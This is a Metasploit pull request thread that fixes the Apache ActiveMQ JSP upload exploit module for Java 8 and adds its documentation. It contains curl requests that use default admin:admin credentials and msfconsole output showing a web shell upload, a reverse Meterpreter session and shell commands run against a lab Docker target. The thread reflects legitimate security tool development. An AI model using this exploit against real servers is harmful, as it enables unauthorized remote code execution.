Fix apache_activemq_upload_jsp exploit module for Java 8
rapid7/metasploit-framework pull request #14896
Opened 2021-03-14 23:00 UTC by AlanFoster

Fixes apache_activemq_upload_jsp exploit module to work with Java 8 and adds module documentation

This module was broken for me against a target using Java 8 and ApacheMQ 5.9.0

The module attempts visits `/admin/test/systemProperties.jsp` which for some reason on Java 8 gives a 500 response without the required system information:
![image](https://user-images.githubusercontent.com/1271782/111086954-e4d6f700-8516-11eb-88a3-b0210c98b012.png)

With curl:

```
curl --user admin:admin -v http://localhost:8161/admin/test/systemProperties.jsp
*   Trying ::1:8161...
* TCP_NODELAY set
* Connected to localhost (::1) port 8161 (#0)
* Server auth using Basic with user 'admin'
> GET /admin/test/systemProperties.jsp HTTP/1.1
> Host: localhost:8161
> Authorization: Basic YWRtaW46YWRtaW4=
> User-Agent: curl/7.68.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 500 PWC6033: Unable to compile class for JSP  PWC6197: An error occurred at line: 36 in the jsp file: /test/systemProperties.jsp PWC6199: Generated servlet error: The type java.util.Map$Entry cannot be resolved. It is indirectly referenced from required .class files  
< Set-Cookie: JSESSIONID=4rofdf22s8v1rwlfllvr2b7d;Path=/admin
< Accept-Ranges: bytes
< Content-Type: text/html
< Content-Length: 5909
< Last-Modified: Mon, 14 Oct 2013 22:41:48 GMT
< Server: Jetty(7.6.9.v20130131)
< 
```

I've updated the module to use `/admin/test/` instead which has the same data:

![image](https://user-images.githubusercontent.com/1271782/111086932-d092fa00-8516-11eb-9de4-1be40a3331a1.png)

## Verification

Verification steps are in the read me, they were mostly pulled from the original pull request here https://github.com/rapid7/metasploit-framework/pull/8519. I don't believe this has been tested against a windows target.

Note that I verified this works with 5.0.9 on Java 8, and with 5.0.10 and 5.0.11 with Java 7. However, it seemed that this module doesn't work with 5.0.12 or 5.0.13 - even though the advisory claims those versions are impacted. Additional work may be required to fix those versions.

2021-03-15 19:25 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/apache_activemq_upload_jsp.md
> +1. You should get a shell.
As which user though?

2021-03-15 19:33 UTC, gwillcox-r7 requested changes

2021-03-15 19:33 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/apache_activemq_upload_jsp.md
> +1. You should get a shell.
As which user though?

2021-03-15 19:33 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/apache_activemq_upload_jsp.md
> +system. Do not include the .jsp extension (Default: randomly-generated string)
Unrelated comment but it seems this option name could be improved. `JSP` should really be something like `FILENAME` or `SHELL_FILENAME`.

2021-03-15 19:33 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/apache_activemq_upload_jsp.md
> +user determines that a nonstandard directory is able to execute .jsp files, user
```suggestion
user determines that a nonstandard directory is able to execute .jsp files, the user
```

2021-03-15 19:33 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/apache_activemq_upload_jsp.md
> +allows remote attackers to upload and execute arbitrary files via an HTTP PUT
Again execute them as which user? The user that installed Apache ActiveMQ? The user that runs a specific service? `root`? `apache`? Its hard to tell the risk without this information.

2021-03-15 19:33 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/apache_activemq_upload_jsp.md
> +msf6 exploit(multi/http/apache_activemq_upload_jsp) > back
This part can likely be cut out, its extra info and you set `RHOST` later on anyway.

2021-03-20 15:28 UTC, AlanFoster commented on documentation/modules/exploit/multi/http/apache_activemq_upload_jsp.md
> +allows remote attackers to upload and execute arbitrary files via an HTTP PUT
Added a note:
> You should get a shell under the process running ActiveMQ.

2021-03-20 15:32 UTC, AlanFoster commented on documentation/modules/exploit/multi/http/apache_activemq_upload_jsp.md
> +msf6 exploit(multi/http/apache_activemq_upload_jsp) > back
Cut ✂️

2021-03-20 15:32 UTC, AlanFoster commented on documentation/modules/exploit/multi/http/apache_activemq_upload_jsp.md
> +user determines that a nonstandard directory is able to execute .jsp files, user
Done :+1:

2021-03-20 15:35 UTC, AlanFoster commented on documentation/modules/exploit/multi/http/apache_activemq_upload_jsp.md
> +1. You should get a shell.
Updated

2021-03-20 15:37 UTC, AlanFoster commented on documentation/modules/exploit/multi/http/apache_activemq_upload_jsp.md
> +system. Do not include the .jsp extension (Default: randomly-generated string)
I think `filename` is the convention in the codebase, but I'm happy to leave this as-is. I don't think it would be configured much in the real world 😄

2021-03-22 17:26 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/apache_activemq_upload_jsp.md
> +1. You should get a shell.
I'll fix this up a bit, think `You should get a shell as the user running ActiveMQ` would be better from a permission point of view, but this should have enough information now for me to make that small adjustment. Marking resolved.

2021-03-22 17:27 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/apache_activemq_upload_jsp.md
> +system. Do not include the .jsp extension (Default: randomly-generated string)
Yeah my gut says this should be `FILENAME` to conform with the rest of the codebase. My main issue here is that the option name doesn't actually describe the option itself, which is kind of what options are meant to do 😄

2021-03-24 14:12 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/apache_activemq_upload_jsp.md
> +system. Do not include the .jsp extension (Default: randomly-generated string)
Eh going to mark this as resolved, its not really related to this PR and if someone wants to change it later on they are welcome to do so.

2021-03-24 14:18 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/apache_activemq_upload_jsp.md
> +1. You should get a shell.
Fixed in https://github.com/rapid7/metasploit-framework/pull/14896/commits/9d7e9990f461f21f60673798632f43f1bc5187b9

2021-03-24 14:47 UTC, gwillcox-r7 commented
Hmm unable to replicate this with the adjustments, here are my testing results against the Docker image described in the documentation (the setup instructions for Java 8 with ApacheMQ 5.9.0):

```
msf6 exploit(multi/http/apache_activemq_upload_jsp) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
####################
# Request:
####################
GET http://127.0.0.1:8161/admin/test/ HTTP/1.1
Host: 127.0.0.1:8161
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close


####################
# Response:
####################
HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: JSESSIONID=1bc8nxga20wun8jpjhhg5uzhl;Path=/admin
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Server: Jetty(7.6.9.v20130131)







<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    <title>localhost : Test Pages</title>
    <style type="text/css" media="screen">
        @import url('/admin/styles/sorttable.css');
        @import url('/admin/styles/type-settings.css');
        @import url('/admin/styles/site.css');
        @import url('/admin/styles/prettify.css');
    </style>
    
        <script type='text/javascript' src='/admin/js/common.js'></script>
        <script type='text/javascript' src='/admin/js/css.js'></script>
        <script type='text/javascript' src='/admin/js/standardista-table-sorting.js'></script>
        <script type='text/javascript' src='/admin/js/prettify.js'></script>
        <script>addEvent(window, 'load', prettyPrint)</script>
    

    


</head>

<body>

<div class="white_box">
    <div class="header">
        <div class="header_l">
            <div class="header_r">
            </div>
        </div>
    </div>
    <div class="content">
        <div class="content_l">
            <div class="content_r">

                <div>

                    <!-- Banner -->
                    <div id="asf_logo">
                        <div id="activemq_logo">
                            <a style="float:left; width:280px;display:block;text-indent:-5000px;text-decoration:none;line-height:60px; margin-top:10px; margin-left:100px;"
                                href="http://activemq.apache.org/" title="The most popular and powerful open source Message Broker">ActiveMQ</a> &trade;
                            <a style="float:right; width:210px;display:block;text-indent:-5000px;text-decoration:none;line-height:60px; margin-top:15px; margin-right:10px;"
                                href="http://www.apache.org/" title="The Apache Software Foundation">ASF</a>
                        </div>
                    </div>


                    <div class="top_red_bar">
                        <div id="site-breadcrumbs">
                            <a href="/admin/index.jsp;jsessionid=1bc8nxga20wun8jpjhhg5uzhl" title="Home">Home</a>
                            &#124;
                            <a href="/admin/queues.jsp;jsessionid=1bc8nxga20wun8jpjhhg5uzhl" title="Queues">Queues</a>
                            &#124;
                            <a href="/admin/topics.jsp;jsessionid=1bc8nxga20wun8jpjhhg5uzhl" title="Topics">Topics</a>
                            &#124;
                            <a href="/admin/subscribers.jsp;jsessionid=1bc8nxga20wun8jpjhhg5uzhl" title="Subscribers">Subscribers</a>
                            &#124;
                            <a href="/admin/connections.jsp;jsessionid=1bc8nxga20wun8jpjhhg5uzhl" title="Connections">Connections</a>
                            &#124;
                            <a href="/admin/network.jsp;jsessionid=1bc8nxga20wun8jpjhhg5uzhl" title="Network">Network</a>
                            &#124;
                             <a href="/admin/scheduled.jsp;jsessionid=1bc8nxga20wun8jpjhhg5uzhl" title="Scheduled">Scheduled</a>
                            &#124;
                            <a href="/admin/send.jsp;jsessionid=1bc8nxga20wun8jpjhhg5uzhl"
                               title="Send">Send</a>
                        </div>
                        <div id="site-quicklinks"><P>
                            <a href="http://activemq.apache.org/support.html"
                               title="Get help and support using Apache ActiveMQ">Support</a></p>
                        </div>
                    </div>

                    <table border="0">
                        <tbody>
                            <tr>
                                <td valign="top" width="100%" style="overflow:hidden;">
                                    <div class="body-content">
                                        

<h2>Test Pages</h2>

These pages are used to test out the environment and web framework.

<table class="autostripe">
<thead>
<tr>
<th colspan="2">Headers</th>
</tr>
</thead>
<tbody>
<tr> 
  <td class="label">request.contextPath</td>
  <td>/admin</td>
</tr>
<tr> 
  <td class="label">request.requestURI</td>
  <td>/admin/test/index.jsp</td>
</tr>
<tr> 
  <td class="label">request.remoteAddr</td>
  <td>172.18.0.1</td>
</tr>
<tr> 
  <td class="label">request.remoteHost</td>
  <td>172.18.0.1</td>
</tr>
<tr> 
  <td class="label">request.queryString</td>
  <td></td>
</tr>
<tr> 
  <td class="label">request.scheme</td>
  <td>http</td>
</tr>
<tr> 
  <td class="label">request.serverName</td>
  <td>127.0.0.1</td>
</tr>
<tr> 
  <td class="label">request.serverPort</td>
  <td>8161</td>
</tr>
<tr> 
  <td class="label">Spring applicationContext</td>
  <td>{}</td>
</tr>
<tr> 
  <td class="label">Spring requestContext</td>
  <td>{}</td>
</tr>
<tr> 
  <td class="label">System properties</td>
  <td>{java.runtime.name=OpenJDK Runtime Environment, sun.boot.library.path=/usr/local/openjdk-8/jre/lib/amd64, java.vm.version=25.282-b08, java.vm.vendor=Oracle Corporation, java.vendor.url=http://java.oracle.com/, java.rmi.server.randomIDs=true, path.separator=:, java.util.logging.config.file=logging.properties, java.vm.name=OpenJDK 64-Bit Server VM, file.encoding.pkg=sun.io, sun.java.launcher=SUN_STANDARD, sun.os.patch.level=unknown, activemq.home=/opt/activemq, java.vm.specification.name=Java Virtual Machine Specification, user.dir=/opt/apache-activemq-5.9.0, java.runtime.version=1.8.0_282-b08, java.awt.graphicsenv=sun.awt.X11GraphicsEnvironment, activemq.classpath=/opt/activemq/conf;, java.endorsed.dirs=/usr/local/openjdk-8/jre/lib/endorsed, os.arch=amd64, java.io.tmpdir=/opt/activemq/tmp, line.separator=
, java.vm.specification.vendor=Oracle Corporation, hawtio.rolePrincipalClasses=org.apache.activemq.jaas.GroupPrincipal, os.name=Linux, activemq.base=/opt/activemq, hawtio.realm=activemq, sun.jnu.encoding=UTF-8, java.library.path=/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib, java.specification.name=Java Platform API Specification, java.class.version=52.0, org.apache.activemq.util.LockFile.lock./opt/apache-activemq-5.9.0/data/kahadb/lock=Wed Mar 24 14:38:28 UTC 2021, sun.management.compiler=HotSpot 64-Bit Tiered Compilers, os.version=5.8.0-44-generic, user.home=/opt/activemq, user.timezone=Etc/UTC, java.awt.printerjob=sun.print.PSPrinterJob, file.encoding=UTF-8, java.specification.version=1.8, java.class.path=/opt/activemq/bin/activemq.jar, user.name=activemq, com.sun.management.jmxremote=, java.vm.specification.version=1.8, sun.java.command=/opt/activemq/bin/activemq.jar start, java.home=/usr/local/openjdk-8/jre, sun.arch.data.model=64, user.language=en, java.specification.vendor=Oracle Corporation, awt.toolkit=sun.awt.X11.XToolkit, java.vm.info=mixed mode, activemq.conf=/opt/activemq/conf, java.version=1.8.0_282, java.ext.dirs=/usr/local/openjdk-8/jre/lib/ex [...]

2021-03-24 15:18 UTC, gwillcox-r7 commented
Woops it appears I used localhost of my local machine vs the docker interface. Here is my test once this was fixed showing this works successfully and we can land this PR now:

```
msf6 exploit(multi/http/apache_activemq_upload_jsp) > show options

Module options (exploit/multi/http/apache_activemq_upload_jsp):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   AutoCleanup    true             no        Remove web shells after callback is received
   BasicAuthPass  admin            yes       The password for the specified username
   BasicAuthUser  admin            yes       The username to authenticate as
   JSP                             no        JSP name to use, excluding the .jsp extension (default: random)
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS         127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          8161             yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                           no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  docker0          yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf6 exploit(multi/http/apache_activemq_upload_jsp) > run

[*] Started reverse TCP handler on 172.18.0.1:4444 
[*] Uploading http://127.0.0.1:8161/opt/activemq/webapps/api/CKIuXXMYX.jar
[*] Uploading http://127.0.0.1:8161/opt/activemq/webapps/api/CKIuXXMYX.jsp
[*] Sending stage (58110 bytes) to 172.18.0.2
[*] Meterpreter session 2 opened (172.18.0.1:4444 -> 172.18.0.2:49214) at 2021-03-24 10:17:23 -0500
[+] Deleted /opt/activemq/webapps/api/CKIuXXMYX.jar
[+] Deleted /opt/activemq/webapps/api/CKIuXXMYX.jsp

meterpreter > getuid
Server username: activemq
meterpreter > pwd
/opt/apache-activemq-5.9.0
meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=999(activemq) gid=999(activemq) groups=999(activemq)
whoami
activemq
```

2021-03-24 15:19 UTC, gwillcox-r7 approved these changes

2021-03-24 15:24 UTC, merged

2021-03-24 15:26 UTC, gwillcox-r7 commented
# Release Notes
The `apache_activemq_upload_jsp` exploit has been updated so that it can successfully exploit vulnerable systems running Java 8. Additionally, module documentation has been added.